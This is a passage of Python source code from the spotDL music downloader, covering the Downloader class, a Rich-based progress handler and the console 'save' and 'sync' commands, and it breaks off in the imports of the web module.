) # If ffmpeg is the default value and it's not installed # try to use the spotdl's ffmpeg self.ffmpeg = self.settings["ffmpeg"] if self.ffmpeg == "ffmpeg" and shutil.which("ffmpeg") is None: ffmpeg_exec = get_ffmpeg_path() if ffmpeg_exec is None: raise DownloaderError("ffmpeg is not installed") self.ffmpeg = str(ffmpeg_exec.absolute()) logger.debug("FFmpeg path: %s", self.ffmpeg) self.loop = loop or ( asyncio.new_event_loop() if sys.platform != "win32" else asyncio.ProactorEventLoop() # type: ignore ) if loop is None: asyncio.set_event_loop(self.loop) # semaphore is required to limit concurrent asyncio executions self.semaphore = asyncio.Semaphore(self.settings["threads"]) self.progress_handler = ProgressHandler(self.settings["simple_tui"]) # Gather already present songs self.scan_formats = self.settings["detect_formats"] or [self.settings["format"]] self.known_songs: Dict[str, List[Path]] = {} if self.settings["scan_for_songs"]: logger.info("Scanning for known songs, this might take a while...") for scan_format in self.scan_formats: logger.debug("Scanning for %s files", scan_format) found_files = gather_known_songs(self.settings["output"], scan_format) logger.debug("Found %s %s files", len(found_files), scan_format) for song_url, song_paths in found_files.items(): known_paths = self.known_songs.get(song_url) if known_paths is None: self.known_songs[song_url] = song_paths else: self.known_songs[song_url].extend(song_paths) logger.debug("Found %s known songs", len(self.known_songs)) # Initialize lyrics providers self.lyrics_providers: List[LyricsProvider] = [] for lyrics_provider in self.settings["lyrics_providers"]: lyrics_class = LYRICS_PROVIDERS.get(lyrics_provider) if lyrics_class is None: raise DownloaderError(f"Invalid lyrics provider: {lyrics_provider}") if lyrics_provider == "genius": access_token = self.settings.get("genius_token") if not access_token: raise DownloaderError("Genius token not found in settings") self.lyrics_providers.append(Genius(access_token)) else: self.lyrics_providers.append(lyrics_class()) # Initialize audio providers self.audio_providers: List[AudioProvider] = [] for audio_provider in self.settings["audio_providers"]: audio_class = AUDIO_PROVIDERS.get(audio_provider) if audio_class is None: raise DownloaderError(f"Invalid audio provider: {audio_provider}") self.audio_providers.append( audio_class( output_format=self.settings["format"], cookie_file=self.settings["cookie_file"], search_query=self.settings["search_query"], filter_results=self.settings["filter_results"], yt_dlp_args=self.settings["yt_dlp_args"], ) ) # Initialize list of errors self.errors: List[str] = [] # Initialize proxy server proxy = self.settings["proxy"] proxies = None if proxy: if not re.match( pattern=r"^(http|https):\/\/(?:(\w+)(?::(\w+))?@)?((?:\d{1,3})(?:\.\d{1,3}){3})(?::(\d{1,5}))?$", # pylint: disable=C0301 string=proxy, ): raise DownloaderError(f"Invalid proxy server: {proxy}") proxies = {"http": proxy, "https": proxy} logger.info("Setting proxy server: %s", proxy) GlobalConfig.set_parameter("proxies", proxies) # Initialize archive self.url_archive = Archive() if self.settings["archive"]: self.url_archive.load(self.settings["archive"]) logger.debug("Archive: %d urls", len(self.url_archive)) logger.debug("Downloader initialized") def download_song(self, song: Song) -> Tuple[Song, Optional[Path]]: """ Download a single song. ### Arguments - song: The song to download. ### Returns - tuple with the song and the path to the downloaded file if successful. 
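
        ### Notes
        - This is a thin wrapper around `download_multiple_songs([song])` that
          returns the first (and only) result.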
""" self.progress_handler.set_song_count(1) results = self.download_multiple_songs([song]) return results[0] def download_multiple_songs( self, songs: List[Song] ) -> List[Tuple[Song, Optional[Path]]]: """ Download multiple songs to the temp directory. ### Arguments - songs: The songs to download. ### Returns - list of tuples with the song and the path to the downloaded file if successful. """ if self.settings["fetch_albums"]: albums = set(song.album_id for song in songs if song.album_id is not None) logger.info( "Fetching %d album%s", len(albums), "s" if len(albums) > 1 else "" ) songs.extend(songs_from_albums(list(albums))) # Remove duplicates return_obj = {} for song in songs: return_obj[song.url] = song songs = list(return_obj.values()) logger.debug("Downloading %d songs", len(songs)) if self.settings["archive"]: songs = [song for song in songs if song.url not in self.url_archive] logger.debug("Filtered %d songs with archive", len(songs)) self.progress_handler.set_song_count(len(songs)) # Create tasks list tasks = [self.pool_download(song) for song in songs] # Call all task asynchronously, and wait until all are finished results = list(self.loop.run_until_complete(asyncio.gather(*tasks))) # Print errors if self.settings["print_errors"]: for error in self.errors: logger.error(error) if self.settings["save_errors"]: with open( self.settings["save_errors"], "w", encoding="utf-8" ) as error_file: error_file.write("\n".join(self.errors)) logger.info("Saved errors to %s", self.settings["save_errors"]) # Save archive if self.settings["archive"]: for result in results: if result[1] or self.settings["add_unavailable"]: self.url_archive.add(result[0].url) self.url_archive.save(self.settings["archive"]) logger.info( "Saved archive with %d urls to %s", len(self.url_archive), self.settings["archive"], ) # Create m3u playlist if self.settings["m3u"]: song_list = [ song for song, path in results if path or self.settings["add_unavailable"] ] gen_m3u_files( song_list, self.settings["m3u"], self.settings["output"], self.settings["format"], self.settings["restrict"], False, self.settings["detect_formats"], ) # Save results to a file if self.settings["save_file"]: with open(self.settings["save_file"], "w", encoding="utf-8") as save_file: json.dump([song.json for song, _ in results], save_file, indent=4) logger.info("Saved results to %s", self.settings["save_file"]) return results async def pool_download(self, song: Song) -> Tuple[Song, Optional[Path]]: """ Run asynchronous task in a pool to make sure that all processes. ### Arguments - song: The song to download. ### Returns - tuple with the song and the path to the downloaded file if successful. ### Notes - This method calls `self.search_and_download` in a new thread. """ # tasks that cannot acquire semaphore will wait here until it's free # only certain amount of tasks can acquire the semaphore at the same time async with self.semaphore: return await self.loop.run_in_executor(None, self.search_and_download, song) def search(self, song: Song) -> str: """ Search for a song using all available providers. ### Arguments - song: The song to search for. ### Returns - tuple with download url and audio provider if successful. 
""" for audio_provider in self.audio_providers: url = audio_provider.search(song, self.settings["only_verified_results"]) if url: return url logger.debug("%s failed to find %s", audio_provider.name, song.display_name) raise LookupError(f"No results found for song: {song.display_name}") def search_lyrics(self, song: Song) -> Optional[str]: """ Search for lyrics using all available providers. ### Arguments - song: The song to search for. ### Returns - lyrics if successful else None. """ for lyrics_provider in self.lyrics_providers: lyrics = lyrics_provider.get_lyrics(song.name, song.artists) if lyrics: logger.debug( "Found lyrics for %s on %s", song.display_name, lyrics_provider.name ) return lyrics logger.debug( "%s failed to find lyrics for %s", lyrics_provider.name, song.display_name, ) return None def search_and_download( # pylint: disable=R0911 self, song: Song ) -> Tuple[Song, Optional[Path]]: """ Search for the song and download it. ### Arguments - song: The song to download. ### Returns - tuple with the song and the path to the downloaded file if successful. ### Notes - This function is synchronous. """ # Check if song has name/artist and url/song_id if not (song.name and (song.artists or song.artist)) and not ( song.url or song.song_id ): logger.error("Song is missing required fields: %s", song.display_name) self.errors.append(f"Song is missing required fields: {song.display_name}") return song, None reinitialized = False try: # Create the output file path output_file = create_file_name( song=song, template=self.settings["output"], file_extension=self.settings["format"], restrict=self.settings["restrict"], file_name_length=self.settings["max_filename_length"], ) except Exception: song = reinit_song(song) output_file = create_file_name( song=song, template=self.settings["output"], file_extension=self.settings["format"], restrict=self.settings["restrict"], file_name_length=self.settings["max_filename_length"], ) reinitialized = True if song.explicit is True and self.settings["skip_explicit"] is True: logger.info("Skipping explicit song: %s", song.display_name) return song, None # Initialize the progress tracker display_progress_tracker = self.progress_handler.get_new_tracker(song) try: # Create the temp folder path temp_folder = get_temp_path() # Check if there is an already existing song file, with the same spotify URL in its # metadata, but saved under a different name. If so, save its path. 
dup_song_paths: List[Path] = self.known_songs.get(song.url, []) # Remove files from the list that have the same path as the output file dup_song_paths = [ dup_song_path for dup_song_path in dup_song_paths if (dup_song_path.absolute() != output_file.absolute()) and dup_song_path.exists() ] file_exists = output_file.exists() or dup_song_paths if not self.settings["scan_for_songs"]: for file_extension in self.scan_formats: ext_path = output_file.with_suffix(f".{file_extension}") if ext_path.exists(): dup_song_paths.append(ext_path) if dup_song_paths: logger.debug( "Found duplicate songs for %s at %s", song.display_name, ", ".join( [f"'{str(dup_song_path)}'" for dup_song_path in dup_song_paths] ), ) # If the file already exists and we don't want to overwrite it, # we can skip the download if ( # pylint: disable=R1705 Path(str(output_file.absolute()) + ".skip").exists() and self.settings["respect_skip_file"] ): logger.info( "Skipping %s (skip file found) %s", song.display_name, "", ) return song, output_file if output_file.exists() else None elif file_exists and self.settings["overwrite"] == "skip": logger.info( "Skipping %s (file already exists) %s", song.display_name, "(duplicate)" if dup_song_paths else "", ) display_progress_tracker.notify_download_skip() return song, output_file # Check if we have all the metadata # and that the song object is not a placeholder # If it's None extract the current metadata # And reinitialize the song object # Force song reinitialization if we are fetching albums # they have most metadata but not all if ( (song.name is None and song.url) or (self.settings["fetch_albums"] and reinitialized is False) or None in [ song.genres, song.disc_count, song.tracks_count, song.track_number, song.album_id, song.album_artist, ] ): song = reinit_song(song) reinitialized = True # Don't skip if the file exists and overwrite is set to force if file_exists and self.settings["overwrite"] == "force": logger.info( "Overwriting %s %s", song.display_name, " (duplicate)" if dup_song_paths else "", ) # If the duplicate song path is not None, we can delete the old file for dup_song_path in dup_song_paths: try: logger.info("Removing duplicate file: %s", dup_song_path) dup_song_path.unlink() except (PermissionError, OSError) as exc: logger.debug( "Could not remove duplicate file: %s, error: %s", dup_song_path, exc, ) # Find song lyrics and add them to the song object try: lyrics = self.search_lyrics(song) if lyrics is None: logger.debug( "No lyrics found for %s, lyrics providers: %s", song.display_name, ", ".join( [lprovider.name for lprovider in self.lyrics_providers] ), ) else: song.lyrics = lyrics except Exception as exc: logger.debug("Could not search for lyrics: %s", exc) # If the file already exists and we want to overwrite the metadata, # we can skip the download if file_exists and self.settings["overwrite"] == "metadata": most_recent_duplicate: Optional[Path] = None if dup_song_paths: # Get the most recent duplicate song path and remove the rest most_recent_duplicate = max( dup_song_paths, key=lambda dup_song_path: dup_song_path.stat().st_mtime and dup_song_path.suffix == output_file.suffix, ) # Remove the rest of the duplicate song paths for old_song_path in dup_song_paths: if most_recent_duplicate == old_song_path: continue try: logger.info("Removing duplicate file: %s", old_song_path) old_song_path.unlink() except (PermissionError, OSError) as exc: logger.debug( "Could not remove duplicate file: %s, error: %s", old_song_path, exc, ) # Move the old file to the new location if ( 
most_recent_duplicate and most_recent_duplicate.suffix == output_file.suffix ): most_recent_duplicate.replace( output_file.with_suffix(f".{self.settings['format']}") ) if ( most_recent_duplicate and most_recent_duplicate.suffix != output_file.suffix ): logger.info( "Could not move duplicate file: %s, different file extension", most_recent_duplicate, ) display_progress_tracker.notify_complete() return song, None # Update the metadata embed_metadata( output_file=output_file, song=song, skip_album_art=self.settings["skip_album_art"], ) logger.info( f"Updated metadata for {song.display_name}" f", moved to new location: {output_file}" if most_recent_duplicate else "" ) display_progress_tracker.notify_complete() return song, output_file # Create the output directory if it doesn't exist output_file.parent.mkdir(parents=True, exist_ok=True) if song.download_url is None: download_url = self.search(song) else: download_url = song.download_url # Initialize audio downloader audio_downloader: Union[AudioProvider, Piped] if self.settings["audio_providers"][0] == "piped": audio_downloader = Piped( output_format=self.settings["format"], cookie_file=self.settings["cookie_file"], search_query=self.settings["search_query"], filter_results=self.settings["filter_results"], yt_dlp_args=self.settings["yt_dlp_args"], ) else: audio_downloader = AudioProvider( output_format=self.settings["format"], cookie_file=self.settings["cookie_file"], search_query=self.settings["search_query"], filter_results=self.settings["filter_results"], yt_dlp_args=self.settings["yt_dlp_args"], ) logger.debug("Downloading %s using %s", song.display_name, download_url) # Add progress hook to the audio provider audio_downloader.audio_handler.add_progress_hook( display_progress_tracker.yt_dlp_progress_hook ) download_info = audio_downloader.get_download_metadata( download_url, download=True ) temp_file = Path( temp_folder / f"{download_info['id']}.{download_info['ext']}" ) if download_info is None: logger.debug( "No download info found for %s, url: %s", song.display_name, download_url, ) raise DownloaderError( f"yt-dlp failed to get metadata for: {song.name} - {song.artist}" ) display_progress_tracker.notify_download_complete() # Copy the downloaded file to the output file # if the temp file and output file have the same extension # and the bitrate is set to auto or disable # Don't copy if the audio provider is piped # unless the bitrate is set to disable if ( self.settings["bitrate"] in ["auto", "disable", None] and temp_file.suffix == output_file.suffix ) and not ( self.settings["audio_providers"][0] == "piped" and self.settings["bitrate"] != "disable" ): shutil.move(str(temp_file), output_file) success = True result = None else: if self.settings["bitrate"] in ["auto", None]: # Use the bitrate from the download info if it exists # otherwise use `copy` bitrate = ( f"{int(download_info['abr'])}k" if download_info.get("abr") else "copy" ) elif self.settings["bitrate"] == "disable": bitrate = None else: bitrate = str(self.settings["bitrate"]) # Convert the downloaded file to the output format success, result = convert( input_file=temp_file, output_file=output_file, ffmpeg=self.ffmpeg, output_format=self.settings["format"], bitrate=bitrate, ffmpeg_args=self.settings["ffmpeg_args"], progress_handler=display_progress_tracker.ffmpeg_progress_hook, ) if self.settings["create_skip_file"]: with open( str(output_file) + ".skip", mode="w", encoding="utf-8" ) as _: pass # Remove the temp file if temp_file.exists(): try: temp_file.unlink() except 
(PermissionError, OSError) as exc: logger.debug( "Could not remove temp file: %s, error: %s", temp_file, exc ) raise DownloaderError( f"Could not remove temp file: {temp_file}, possible duplicate song" ) from exc if not success and result: # If the conversion failed and there is an error message # create a file with the error message # and save it in the errors directory # raise an exception with file path file_name = ( get_errors_path() / f"ffmpeg_error_{datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.txt" ) error_message = "" for key, value in result.items(): error_message += f"### {key}:\n{str(value).strip()}\n\n" with open(file_name, "w", encoding="utf-8") as error_path: error_path.write(error_message) # Remove the file that failed to convert if output_file.exists(): output_file.unlink() raise FFmpegError( f"Failed to convert {song.display_name}, " f"you can find error here: {str(file_name.absolute())}" ) download_info["filepath"] = str(output_file) # Set the song's download url if song.download_url is None: song.download_url = download_url display_progress_tracker.notify_conversion_complete() # SponsorBlock post processor if self.settings["sponsor_block"]: # Initialize the sponsorblock post processor post_processor = SponsorBlockPP( audio_downloader.audio_handler, SPONSOR_BLOCK_CATEGORIES ) # Run the post processor to get the sponsor segments _, download_info = post_processor.run(download_info) chapters = download_info["sponsorblock_chapters"] # If there are sponsor segments, remove them if len(chapters) > 0: logger.info( "Removing %s sponsor segments for %s", len(chapters), song.display_name, ) # Initialize the modify chapters post processor modify_chapters = ModifyChaptersPP( downloader=audio_downloader.audio_handler, remove_sponsor_segments=SPONSOR_BLOCK_CATEGORIES, ) # Run the post processor to remove the sponsor segments # this returns a list of files to delete files_to_delete, download_info = modify_chapters.run(download_info) # Delete the files that were created by the post processor for file_to_delete in files_to_delete: Path(file_to_delete).unlink() try: embed_metadata( output_file, song, id3_separator=self.settings["id3_separator"], skip_album_art=self.settings["skip_album_art"], ) except Exception as exception: raise MetadataError( "Failed to embed metadata to the song" ) from exception if self.settings["generate_lrc"]: generate_lrc(song, output_file) display_progress_tracker.notify_complete() # Add the song to the known songs self.known_songs.get(song.url, []).append(output_file) logger.info('Downloaded "%s": %s', song.display_name, song.download_url) return song, output_file except (Exception, UnicodeEncodeError) as exception: if isinstance(exception, UnicodeEncodeError): exception_cause = exception exception = DownloaderError( "You may need to add PYTHONIOENCODING=utf-8 to your environment" ) exception.__cause__ = exception_cause display_progress_tracker.notify_error( traceback.format_exc(), exception, True ) self.errors.append( f"{song.url} - {exception.__class__.__name__}: {exception}" ) return song, None File: spotdl/download/__init__.py """ Download module that holds the downloader and progress handler modules. """ File: spotdl/download/progress_handler.py """ Module that holds the ProgressHandler class and Song Tracker class. 
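
A rough usage sketch (the `Song` below is a placeholder built from partial data;
real callers normally receive songs from the search utilities):

```python
from spotdl.download.progress_handler import ProgressHandler
from spotdl.types.song import Song

song = Song.from_missing_data(name="Title", artist="Artist", artists=["Artist"])

handler = ProgressHandler(simple_tui=True)
handler.set_song_count(1)
tracker = handler.get_new_tracker(song)
tracker.notify_download_complete()    # 50%, "Converting"
tracker.notify_conversion_complete()  # 95%, "Embedding metadata"
tracker.notify_complete()             # 100%, "Done"
handler.close()
```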
""" import logging from typing import Any, Callable, Dict, List, Optional from rich import get_console from rich.console import JustifyMethod, OverflowMethod from rich.highlighter import Highlighter from rich.markup import escape from rich.progress import ( BarColumn, Progress, ProgressColumn, Task, TaskID, TimeRemainingColumn, ) from rich.style import StyleType from rich.text import Text from spotdl.types.song import Song from spotdl.utils.static import BAD_CHARS __all__ = [ "ProgressHandler", "SongTracker", "ProgressHandlerError", "SizedTextColumn", ] logger = logging.getLogger(__name__) class ProgressHandlerError(Exception): """ Base class for all exceptions raised by ProgressHandler subclasses. """ class SizedTextColumn(ProgressColumn): """ Custom sized text column based on the Rich library. """ def __init__( self, text_format: str, style: StyleType = "none", justify: JustifyMethod = "left", markup: bool = True, highlighter: Optional[Highlighter] = None, overflow: Optional[OverflowMethod] = None, width: int = 20, ) -> None: """ A column containing text. ### Arguments - text_format: The format string to use for the text. - style: The style to use for the text. - justify: The justification to use for the text. - markup: Whether or not the text should be rendered as markup. - highlighter: A Highlighter to use for highlighting the text. - overflow: The overflow method to use for truncating the text. - width: The maximum width of the text. """ self.text_format = text_format self.justify: JustifyMethod = justify self.style = style self.markup = markup self.highlighter = highlighter self.overflow: Optional[OverflowMethod] = overflow self.width = width super().__init__() def render(self, task: Task) -> Text: """ Render the Column. ### Arguments - task: The Task to render. ### Returns - A Text object. """ _text = self.text_format.format(task=task) if self.markup: text = Text.from_markup(_text, style=self.style, justify=self.justify) else: text = Text(_text, style=self.style, justify=self.justify) if self.highlighter: self.highlighter.highlight(text) text.truncate(max_width=self.width, overflow=self.overflow, pad=True) return text class ProgressHandler: """ Class for handling the progress of a download, including the progress bar. """ def __init__( self, simple_tui: bool = False, update_callback: Optional[Callable[[Any, str], None]] = None, web_ui: bool = False, ): """ Initialize the progress handler. ### Arguments - simple_tui: Whether or not to use the simple TUI. - update_callback: A callback to call when the progress bar is updated. """ self.songs: List[Song] = [] self.song_count: int = 0 self.overall_progress = 0 self.overall_total = 100 self.overall_completed_tasks = 0 self.update_callback = update_callback self.previous_overall = self.overall_completed_tasks self.simple_tui = simple_tui self.web_ui = web_ui self.quiet = logger.getEffectiveLevel() < 10 self.overall_task_id: Optional[TaskID] = None if not self.simple_tui: console = get_console() self.rich_progress_bar = Progress( SizedTextColumn( "[white]{task.description}", overflow="ellipsis", width=int(console.width / 3), ), SizedTextColumn( "{task.fields[message]}", width=18, style="nonimportant" ), BarColumn(bar_width=None, finished_style="green"), "[progress.percentage]{task.percentage:>3.0f}%", TimeRemainingColumn(), # Normally when you exit the progress context manager (or call stop()) # the last refreshed display remains in the terminal with the cursor on # the following line. 
You can also make the progress display disappear on # exit by setting transient=True on the Progress constructor transient=True, ) # Basically a wrapper for rich's: with ... as ... self.rich_progress_bar.__enter__() def add_song(self, song: Song) -> None: """ Adds a song to the list of songs. ### Arguments - song: The song to add. """ self.songs.append(song) self.set_song_count(len(self.songs)) def set_songs(self, songs: List[Song]) -> None: """ Sets the list of songs to be downloaded. ### Arguments - songs: The list of songs to download. """ self.songs = songs self.set_song_count(len(songs)) def set_song_count(self, count: int) -> None: """ Set the number of songs to download. ### Arguments - count: The number of songs to download. """ self.song_count = count self.overall_total = 100 * count if not self.simple_tui: if self.song_count > 4: self.overall_task_id = self.rich_progress_bar.add_task( description="Total", message=( f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} " "complete" ), total=self.overall_total, visible=(not self.quiet), ) def update_overall(self) -> None: """ Update the overall progress bar. """ if not self.simple_tui: # If the overall progress bar exists if self.overall_task_id is not None: self.rich_progress_bar.update( self.overall_task_id, message=f"{self.overall_completed_tasks}/" f"{int(self.overall_total / 100)} " "complete", completed=self.overall_progress, ) else: if self.previous_overall != self.overall_completed_tasks: logger.info( "%s/%s complete", self.overall_completed_tasks, self.song_count ) self.previous_overall = self.overall_completed_tasks def get_new_tracker(self, song: Song) -> "SongTracker": """ Get a new progress tracker. ### Arguments - song: The song to track. ### Returns - A new progress tracker. """ return SongTracker(self, song) def close(self) -> None: """ Close the Tui Progress Handler. """ if not self.simple_tui: self.rich_progress_bar.stop() logging.shutdown() class SongTracker: """ Class to track the progress of a song. """ def __init__(self, parent, song: Song) -> None: """ Initialize the Tui Song Tracker. ### Arguments - parent: The parent Tui Progress Handler. """ self.parent: "ProgressHandler" = parent self.song = song # Clean up the song name # from weird unicode characters self.song_name = "".join( char for char in self.song.display_name if char not in [chr(i) for i in BAD_CHARS] ) self.progress: int = 0 self.old_progress: int = 0 self.status = "" if not self.parent.simple_tui: self.task_id = self.parent.rich_progress_bar.add_task( description=escape(self.song_name), message="Processing", total=100, completed=self.progress, start=False, visible=(not self.parent.quiet), ) def update(self, message=""): """ Called at every event. ### Arguments - message: The message to display. 
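
        ### Notes
        - `self.progress` is expected to be set by the notify_*/hook methods before
          calling; this method only propagates the delta since the last update to
          the overall progress bar.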
""" old_message = self.status self.status = message # The change in progress since last update delta = self.progress - self.old_progress if not self.parent.simple_tui: # Update the progress bar # `start_task` called everytime to ensure progress is remove from indeterminate state self.parent.rich_progress_bar.start_task(self.task_id) self.parent.rich_progress_bar.update( self.task_id, description=escape(self.song_name), message=message, completed=self.progress, ) # If task is complete if self.progress == 100 or message == "Error": self.parent.overall_completed_tasks += 1 self.parent.rich_progress_bar.remove_task(self.task_id) else: # If task is complete if self.progress == 100 or message == "Error": self.parent.overall_completed_tasks += 1 # When running web ui print progress # only one time when downloading/converting/embedding if self.parent.web_ui and old_message != self.status: logger.info("%s: %s", self.song_name, message) elif not self.parent.web_ui and delta: logger.info("%s: %s", self.song_name, message) # Update the overall progress bar if self.parent.song_count == self.parent.overall_completed_tasks: self.parent.overall_progress = self.parent.song_count * 100 else: self.parent.overall_progress += delta self.parent.update_overall() self.old_progress = self.progress if self.parent.update_callback: self.parent.update_callback(self, message) def notify_error( self, message: str, traceback: Exception, finish: bool = False ) -> None: """ Logs an error message. ### Arguments - message: The message to log. - traceback: The traceback of the error. - finish: Whether to finish the task. """ self.update("Error") if finish: self.progress = 100 if logger.getEffectiveLevel() == logging.DEBUG: logger.exception(message) else: logger.error("%s: %s", traceback.__class__.__name__, traceback) def notify_download_complete(self, status="Converting") -> None: """ Notifies the progress handler that the song has been downloaded. ### Arguments - status: The status to display. """ self.progress = 50 self.update(status) def notify_conversion_complete(self, status="Embedding metadata") -> None: """ Notifies the progress handler that the song has been converted. ### Arguments - status: The status to display. """ self.progress = 95 self.update(status) def notify_complete(self, status="Done") -> None: """ Notifies the progress handler that the song has been downloaded and converted. ### Arguments - status: The status to display. """ self.progress = 100 self.update(status) def notify_download_skip(self, status="Skipped") -> None: """ Notifies the progress handler that the song has been skipped. ### Arguments - status: The status to display. """ self.progress = 100 self.update(status) def ffmpeg_progress_hook(self, progress: int) -> None: """ Updates the progress. ### Arguments - progress: The progress to update to. """ if self.parent.simple_tui and not self.parent.web_ui: self.progress = 50 else: self.progress = 50 + int(progress * 0.45) self.update("Converting") def yt_dlp_progress_hook(self, data: Dict[str, Any]) -> None: """ Updates the progress. ### Arguments - progress: The progress to update to. 
""" if data["status"] == "downloading": file_bytes = data.get("total_bytes") if file_bytes is None: file_bytes = data.get("total_bytes_estimate") downloaded_bytes = data.get("downloaded_bytes") if self.parent.simple_tui and not self.parent.web_ui: self.progress = 50 elif file_bytes and downloaded_bytes: self.progress = downloaded_bytes / file_bytes * 50 self.update("Downloading") File: spotdl/console/save.py """ Save module for the console. """ import asyncio import json import logging from typing import List from spotdl.download.downloader import Downloader, DownloaderError from spotdl.types.song import Song from spotdl.utils.m3u import gen_m3u_files from spotdl.utils.search import parse_query __all__ = ["save"] logger = logging.getLogger(__name__) def save( query: List[str], downloader: Downloader, ) -> None: """ Save metadata from spotify to the disk. ### Arguments - query: list of strings to search for. - downloader: Already initialized downloader instance. ### Notes - This function is multi-threaded. """ save_path = downloader.settings["save_file"] m3u_file = downloader.settings["m3u"] to_stdout = save_path == "-" if save_path is None and not to_stdout: raise DownloaderError("Save file is not specified") # Parse the query songs = parse_query( query=query, threads=downloader.settings["threads"], use_ytm_data=downloader.settings["ytm_data"], playlist_numbering=downloader.settings["playlist_numbering"], album_type=downloader.settings["album_type"], ) save_data = [song.json for song in songs] def process_song(song: Song): try: data = downloader.search(song) if data is None: logger.error("Could not find a match for %s", song.display_name) return None logger.info("Found url for %s: %s", song.display_name, data) return {**song.json, "download_url": data} except Exception as exception: logger.error("%s generated an exception: %s", song.display_name, exception) return None async def pool_worker(song: Song): async with downloader.semaphore: # The following function calls blocking code, which would block whole event loop. # Therefore it has to be called in a separate thread via ThreadPoolExecutor. This # is not a problem, since GIL is released for the I/O operations, so it shouldn't # hurt performance. return await downloader.loop.run_in_executor(None, process_song, song) if downloader.settings["preload"]: tasks = [pool_worker(song) for song in songs] # call all task asynchronously, and wait until all are finished save_data = list(downloader.loop.run_until_complete(asyncio.gather(*tasks))) if to_stdout: # Print the songs to stdout print(json.dumps(save_data, indent=4, ensure_ascii=False)) elif save_path: # Save the songs to a file with open(save_path, "w", encoding="utf-8") as save_file: json.dump(save_data, save_file, indent=4, ensure_ascii=False) if m3u_file: gen_m3u_files( songs, m3u_file, downloader.settings["output"], downloader.settings["format"], downloader.settings["restrict"], False, ) if not to_stdout: logger.info( "Saved %s song%s to %s", len(save_data), "s" if len(save_data) > 1 else "", save_path, ) File: spotdl/console/sync.py """ Sync module for the console. 
""" import json import logging from typing import List, Tuple from pathlib import Path from spotdl.download.downloader import Downloader from spotdl.types.song import Song from spotdl.utils.formatter import create_file_name from spotdl.utils.m3u import gen_m3u_files from spotdl.utils.search import parse_query __all__ = ["sync"] logger = logging.getLogger(__name__) def sync( query: List[str], downloader: Downloader, ) -> None: """ Sync function for the console. It will download the songs and remove the ones that are no longer present in the playlists/albums/etc ### Arguments - query: list of strings to search for. - downloader: Already initialized downloader instance. """ save_path = downloader.settings["save_file"] downloader.settings["save_file"] = None m3u_file = downloader.settings["m3u"] downloader.settings["m3u"] = None # Query and save file # Create initial sync file if query and save_path: if any(req for req in query if req.endswith(".spotdl")): # If the query contains a .spotdl file, and we are about to create # .spotdl file, raise an error. raise ValueError( "Cannot create a sync file with a .spotdl file in the query." ) # Parse the query songs_list = parse_query( query=query, threads=downloader.settings["threads"], use_ytm_data=downloader.settings["ytm_data"], playlist_numbering=downloader.settings["playlist_numbering"], album_type=downloader.settings["album_type"], ) # Create sync file with open(save_path, "w", encoding="utf-8") as save_file: json.dump( { "type": "sync", "query": query, "songs": [song.json for song in songs_list], }, save_file, indent=4, ensure_ascii=False, ) # Perform initial download downloader.download_multiple_songs(songs_list) # Create m3u file if m3u_file: gen_m3u_files( songs_list, m3u_file, downloader.settings["output"], downloader.settings["format"], downloader.settings["restrict"], False, ) return None # If the query is a single file, download it if ( # pylint: disable=R1702 len(query) == 1 # pylint: disable=R1702 and query[0].endswith(".spotdl") # pylint: disable=R1702 and not save_path # pylint: disable=R1702 ): # Load the sync file with open(query[0], "r", encoding="utf-8") as sync_file: sync_data = json.load(sync_file) # Verify the sync file if ( not isinstance(sync_data, dict) or sync_data.get("type") != "sync" or sync_data.get("songs") is None ): raise ValueError("Sync file is not a valid sync file.") # Parse the query songs_playlist = parse_query( query=sync_data["query"], threads=downloader.settings["threads"], use_ytm_data=downloader.settings["ytm_data"], playlist_numbering=downloader.settings["playlist_numbering"], album_type=downloader.settings["album_type"], ) # Get the names and URLs of previously downloaded songs from the sync file old_files = [] for entry in sync_data["songs"]: file_name = create_file_name( Song.from_dict(entry), downloader.settings["output"], downloader.settings["format"], downloader.settings["restrict"], ) old_files.append((file_name, entry["url"])) new_urls = [song.url for song in songs_playlist] # Delete all song files whose URL is no longer part of the latest playlist if not downloader.settings["sync_without_deleting"]: # Rename songs that have "{list-length}", "{list-position}", "{list-name}", # in the output path so that we don't have to download them again, # and to avoid mangling the directory structure. 
to_rename: List[Tuple[Path, Path]] = [] to_delete = [] for path, url in old_files: if url not in new_urls: to_delete.append(path) else: new_song = songs_playlist[new_urls.index(url)] new_path = create_file_name( Song.from_dict(new_song.json), downloader.settings["output"], downloader.settings["format"], downloader.settings["restrict"], ) if path != new_path: to_rename.append((path, new_path)) # TODO: Downloading duplicate songs in the same playlist # will trigger a re-download of the song. To fix this we have to copy the song # to the new location without removing the old one. for old_path, new_path in to_rename: if old_path.exists(): logger.info("Renaming %s to %s", f"'{old_path}'", f"'{new_path}'") if new_path.exists(): old_path.unlink() continue try: old_path.rename(new_path) except (PermissionError, OSError) as exc: logger.debug( "Could not rename temp file: %s, error: %s", old_path, exc ) else: logger.debug("%s does not exist.", old_path) if downloader.settings["sync_remove_lrc"]: lrc_file = old_path.with_suffix(".lrc") new_lrc_file = new_path.with_suffix(".lrc") if lrc_file.exists(): logger.debug( "Renaming lrc %s to %s", f"'{lrc_file}'", f"'{new_lrc_file}'", ) try: lrc_file.rename(new_lrc_file) except (PermissionError, OSError) as exc: logger.debug( "Could not rename lrc file: %s, error: %s", lrc_file, exc, ) else: logger.debug("%s does not exist.", lrc_file) for file in to_delete: if file.exists(): logger.info("Deleting %s", file) try: file.unlink() except (PermissionError, OSError) as exc: logger.debug( "Could not remove temp file: %s, error: %s", file, exc ) else: logger.debug("%s does not exist.", file) if downloader.settings["sync_remove_lrc"]: lrc_file = file.with_suffix(".lrc") if lrc_file.exists(): logger.debug("Deleting lrc %s", lrc_file) try: lrc_file.unlink() except (PermissionError, OSError) as exc: logger.debug( "Could not remove lrc file: %s, error: %s", lrc_file, exc, ) else: logger.debug("%s does not exist.", lrc_file) if len(to_delete) == 0: logger.info("Nothing to delete...") else: logger.info("%s old songs were deleted.", len(to_delete)) if m3u_file: gen_m3u_files( songs_playlist, m3u_file, downloader.settings["output"], downloader.settings["format"], downloader.settings["restrict"], False, ) # Write the new sync file with open(query[0], "w", encoding="utf-8") as save_file: json.dump( { "type": "sync", "query": sync_data["query"], "songs": [song.json for song in songs_playlist], }, save_file, indent=4, ensure_ascii=False, ) downloader.download_multiple_songs(songs_playlist) return None raise ValueError( "Wrong combination of arguments. " "Either provide a query and a save path. Or a single sync file in the query" ) File: spotdl/console/web.py """ Web module for the console. """ import asyncio import logging import os import sys import webbrowser from pathlib import Path from fastapi import Depends, FastAPI from fastapi.middleware.cors import 